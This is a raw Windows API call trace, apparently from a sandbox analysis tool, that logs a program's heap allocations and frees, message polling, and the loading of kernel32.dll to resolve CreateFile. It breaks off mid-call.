HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0197.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0197.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0197.787] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0197.787] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907340 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0197.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.790] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0197.790] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.790] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0197.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0197.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.790] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0197.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0197.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba228 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0197.791] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0197.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0197.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0197.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0197.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0197.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0197.795] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.795] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0197.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.798] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd9c0 [0197.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd9c0, 